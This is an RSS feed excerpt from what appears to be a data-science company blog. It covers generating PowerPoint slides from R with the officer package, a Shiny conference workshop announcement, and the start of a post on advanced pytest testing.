&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;transparent&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Match the panel colour to the slide&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#F1EADE&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bill Length (mm)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Flipper Length (mm)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I can add empty slides to the document using the &lt;code&gt;add_slide()&lt;/code&gt; function.
Here I simply choose a layout from my &lt;code&gt;.pptx&lt;/code&gt; file to use.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_slide&lt;/span&gt;(doc, layout &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;, master &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Office Theme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then, using the ph_with() function, I can insert R objects into my
placeholders by name&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Adelie&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add the plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; adelie_plot,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;myplot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To create the PowerPoint, use &lt;code&gt;print()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(doc, &lt;span style="color:#a5d6ff"&gt;&amp;#34;penguins.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/adelie_slide.png" alt="An example of the PowerPoint output." style="display: block; margin: auto;" /&gt;
&lt;p&gt;And there we have it! I’ve used only two placeholders here to keep the
example simple, but in reality there is no limit.&lt;/p&gt;
&lt;h3 id="looping"&gt;Looping&lt;/h3&gt;
&lt;p&gt;It’s easy to make use of programming when using purely R code to
generate PowerPoints. For instance, we could stick our code into a for
loop, and add a slide for each Penguin species&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Read in doc again&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# this resets the doc object to the original file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_pptx&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;mytemplate.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; (penguin_species &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Adelie&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Chinstrap&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Gentoo&amp;#34;&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_slide&lt;/span&gt;(doc, layout &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Title Slide&amp;#34;&lt;/span&gt;, master &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Office Theme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add the title using the iterator value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguin_species,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Create the plot using the iterator value&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; penguin_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(species &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; penguin_species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bill_length_mm, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flipper_length_mm)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_linedraw&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;transparent&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#F1EADE&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bill Length (mm)&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Flipper Length (mm)&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Add the plot&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_with&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; doc,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; adelie_plot,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; location &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ph_location_label&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Output to a file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;print&lt;/span&gt;(doc, &lt;span style="color:#a5d6ff"&gt;&amp;#34;penguins_loop.pptx&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/images/looped_slides.png" alt="An example output for when looping and iteratively adding slides / inserting content." style="display: block; margin: auto;" /&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;There are a few drawbacks to this method:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It is quite annoying to insert large amounts of text using just an R
script&lt;/li&gt;
&lt;li&gt;Content added to the “Slide Master” slide cannot be moved or edited on
the output file&lt;/li&gt;
&lt;li&gt;The web version of powerpoint doesn’t have the Slide Master
functionality features&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, I think the pros outweigh the cons:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Completely (and I mean completely) custom layouts&lt;/li&gt;
&lt;li&gt;I haven’t covered this here but it’s really easy to &lt;a href="https://www.pipinghotdata.com/posts/2020-09-22-exporting-editable-ggplot-graphics-to-powerpoint-with-officer-and-purrr/" rel="external"&gt;convert ggplots
to vector graphics in DrawingML format so they can be edited in
PowerPoint&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Easier to programmatically generate lots of slides&lt;/li&gt;
&lt;li&gt;It can be edited after rendering by anyone!&lt;/li&gt;
&lt;li&gt;It can be styled before rendering by anyone!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/custom-powerpoints-using-officer/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Workshops</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/</link><pubDate>Tue, 20 May 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
.bio {
display: flex;
column-gap: 2rem;
align-items: center;
padding: 1rem 0 2rem 0;
}
.bio img {
width: 200px;
}
[id="register-now"] {
display: block;
margin-bottom: 2rem;
}
@media (max-width: 1290px) {
.bio {
flex-direction: column;
}
}
&lt;/style&gt;
&lt;p&gt;Shiny in Production is heading back to The Catalyst in Newcastle upon Tyne
this October! We’ve got a great mix of workshops and a full day of talks, with speakers
being announced soon. You’ll find all the workshop details below,
and you can sign up now on the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.
Whether you’re just getting started with Shiny or have been using it for years, come join us for a great
hands-on experience with Shiny and other web-based development tools.&lt;/p&gt;
&lt;p&gt;Day one of the conference (Wednesday 8th October), will consist of
the three parallel workshops running from 13:30 to 17:00, followed by a drinks reception in the
evening, a great opportunity for networking and debriefing from the
day’s learning.&lt;/p&gt;
&lt;p&gt;&lt;a id="register-now" href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="workshop-1-end-to-end-testing-for-shiny-with-playwright-and-golem---colin-fay"&gt;Workshop 1: End-to-End testing for {shiny} with Playwright and {golem} - &lt;a href="https://colinfay.me/" rel="external"&gt;Colin Fay&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;A Shiny application that dazzles in development can still fall apart in
production if user journeys break, data pipelines drift, or browsers
behave unexpectedly. Automated end-to-end (E2E) testing is the safety
net that keeps released apps robust, and Playwright is quickly becoming
the gold-standard tool for doing it across Chrome, Firefox and WebKit.
In this hands-on workshop we’ll walk through a workflow for writing,
running and maintaining Playwright tests that keep your Shiny apps
ship-shape long after launch. Here’s what we’ll tackle:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;why E2E testing matters even when you already have unit tests&lt;/li&gt;
&lt;li&gt;installing and configuring Playwright in a golem project using {pw}&lt;/li&gt;
&lt;li&gt;scripting core user flows—clicks, inputs&amp;hellip;&lt;/li&gt;
&lt;li&gt;validating data and UI state with snapshots and assertions&lt;/li&gt;
&lt;li&gt;running tests headlessly in CI pipelines (GitHub Actions, GitLab CI, Posit Connect)&lt;/li&gt;
&lt;li&gt;handling Shiny specificity&lt;/li&gt;
&lt;li&gt;debugging failed tests&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For this workshop, bring a laptop and a Shiny app you care about.
You’ll leave with a working Playwright test harness you can drop
straight into your projects—plus the confidence to deploy on Friday without fear.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand the role of end-to-end testing in the Shiny deployment pipeline&lt;/li&gt;
&lt;li&gt;be able to install Playwright and scaffold tests from R&lt;/li&gt;
&lt;li&gt;write expressive Playwright scripts that capture user journeys in a Shiny app&lt;/li&gt;
&lt;li&gt;run tests in parallel across browsers locally and in continuous-integration systems&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker"&gt;About the speaker&lt;/h4&gt;
&lt;div class="bio"&gt;
&lt;img src="images/colin-fay.jpg" alt="Photo of Colin Fay" /&gt;
&lt;p&gt;Colin Fay is a Lead Developer at &lt;a href="https://thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt;, a French agency specializing in all things R.
By day, he helps companies unlock R&amp;rsquo;s full potential by building tools, architecting infrastructure,
and developing data and software engineering solutions. His expertise spans web applications
(frontend &amp;amp; backend), R in production, and scalable software development.
By night, he&amp;rsquo;s an open-source enthusiast, international speaker, and long-distance runner.
A passionate advocate for the R community, he actively contributes to open-source projects
and shares his knowledge through talks and workshops worldwide.
Colin is the main developer of &lt;a href="https://golemverse.org/" rel="external"&gt;{golem}&lt;/a&gt;, a framework for building robust Shiny applications,
and the lead author of [Building Production-Grade Shiny Apps](&lt;a href="https://engineering-shiny.org/index.html" rel="external"&gt;https://engineering-shiny.org/index.html&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;h3 id="workshop-2---asynchronous-shiny---dr-russ-hyde"&gt;Workshop 2 - Asynchronous Shiny - &lt;a href="https://github.com/russHyde" rel="external"&gt;Dr Russ Hyde&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Imagine you couldn’t register to attend “Shiny in Production”
if someone else was in the process of registering, and you had to wait
until they had finished before you could click to “Buy tickets on EventBrite”.
This kind of “blocking” shouldn’t happen in modern web applications but is surprisingly
common in Shiny applications. It happens because a single R process handles all of the
server-side processing for multiple users—one long-running task can prevent any other
task from proceeding, hampering interactivity both between and within user-sessions.&lt;/p&gt;
&lt;p&gt;Fortunately, Shiny’s support for asynchronous programming
can alleviate this problem. In the asynchronous approach, you start tasks
running without having to wait for them to complete. But, this requires a
change in mindset for many programmers and there are a few concepts to understand
before you can take advantage of this approach. So, what are you waiting for?
Sign up for this workshop!&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;understand how within-session and between-session blocking can arise in a Shiny app&lt;/li&gt;
&lt;li&gt;understand the basics of asynchronous computation&lt;/li&gt;
&lt;li&gt;solve between-session blocking with future/promise&lt;/li&gt;
&lt;li&gt;solve blocking the modern way, with ExtendedTask&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-1"&gt;About the speaker&lt;/h4&gt;
&lt;div class="bio"&gt;
&lt;img src="images/russ@2x.jpg" alt="Photo of Dr Russ Hyde"/&gt;
&lt;p&gt;Russ has previously worked in molecular biology and bioinformatics. He
holds a PhD in Molecular Physiology and MSc in Mathematics. Russ is an
author of several CRAN packages and mentor on the R-for-data-science
community.&lt;/p&gt;
&lt;/div&gt;
&lt;h3 id="workshop-3-figma-and-user-interface-design-for-shiny---pedro-silva"&gt;Workshop 3: Figma and User-Interface Design for Shiny - &lt;a href="https://pedrocsilva.com/" rel="external"&gt;Pedro Silva&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Applications should look attractive, be engaging, and work intuitively for users.
All of these aspects benefit from spending time focussing on user-interface (UI)
and user experience (UX) design during app development. Indeed, we find that clients
provide lots of feedback on the look and feel of an app, and that it is useful to prepare
a view of the overall design even before any interactive functionality is implemented,
so that design feedback can be obtained as early as possible.&lt;/p&gt;
&lt;p&gt;Graphical tools like Figma allow the designer to build both coarse- and
fine-grained illustrations of how an application or website will look, and simulate
the user workflow through the application. The designs can be shared with clients,
and feedback gathered through comments pinned to the design.&lt;/p&gt;
&lt;p&gt;This workshop requires no prior experience in UI/UX design and will guide
you through your first steps in Figma, demonstrating how to quickly prepare design
ideas for Shiny applications. We’ll also get you started with creating some components—reusable
modules of your design that can transition into different states. You will need a Figma
account to participate; there is a free-tier that is sufficient for the workshop.&lt;/p&gt;
&lt;p&gt;By the end of the workshop, participants will…&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;create simple wireframe designs in Figma&lt;/li&gt;
&lt;li&gt;set font styles and colour palettes consistently across your design&lt;/li&gt;
&lt;li&gt;use the bootstrap UI kit in Figma&lt;/li&gt;
&lt;li&gt;create small components with a simple transition into an alternative state&lt;/li&gt;
&lt;li&gt;use CSS to replicate a simple Figma design in Shiny&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="about-the-speaker-2"&gt;About the speaker&lt;/h4&gt;
&lt;div class="bio"&gt;
&lt;img src="images/pedro@2x.jpg" alt="Photo of Pedro Silva" /&gt;
&lt;p&gt;Pedro is a full stack developer with over 15 years of experience in the
field, loves front-end and R Shiny development, and is a moonlight
practitioner of JavaScript dark arts.&lt;/p&gt;
&lt;/div&gt;
&lt;h3 id="whats-next"&gt;What’s next?&lt;/h3&gt;
&lt;p&gt;Early bird tickets for the conference are still available &lt;strong&gt;at the time of writing&lt;/strong&gt;, so don’t miss out!
The full line up of speakers will be
announced in the coming weeks. Still not convinced? Head over to our
&lt;a href="https://www.youtube.com/@jumping-rivers" rel="external"&gt;YouTube channel&lt;/a&gt; to take a
look at talks from previous years to see what we have in store.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-workshop-announcement/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Advanced Testing in Python</title><link>https://www.jumpingrivers.com/blog/python-testing-advanced/</link><pubDate>Thu, 08 May 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-testing-advanced/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-testing-advanced/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-testing-advanced/featured.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Writing tests is one of the best ways to keep your code reliable and reproducible. This post builds on our
previous blog about Python testing with pytest &lt;a href="https://www.jumpingrivers.com/blog/intro-to-pytest/" rel="external"&gt;Part 1&lt;/a&gt;, and
explores some of the more advanced features it offers. From parametrised fixtures to mocking and other useful pytest
plugins, we will show how to make your tests more reproducible, easier to manage and demonstrate how writing simple
tests can save you time in the long run.&lt;/p&gt;
&lt;h1 id="testing-in-python"&gt;Testing in Python&lt;/h1&gt;
&lt;p&gt;When we write code, it is important to ensure it behaves as expected, which is why we test it. Testing (and re-testing)
our code should be a regular practice, ideally done thoroughly, quickly, and reliably after every change.&lt;/p&gt;
&lt;p&gt;To achieve this, we write additional code to verify the behavior of our main code. We use specific terms
to differentiate between these two types of code:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Production Code:&lt;/strong&gt; the code that fulfills the purpose of the software, and is run by the user.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Test Code:&lt;/strong&gt; additional code only used to test the production code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The directory structure for production and testing code typically looks as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./advanced_pytest/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|── map.py &lt;span style="color:#8b949e;font-style:italic"&gt;# production code&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── tests/
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ ├── parametrised_fixture.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;│ └── test_map.py
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;├── venv
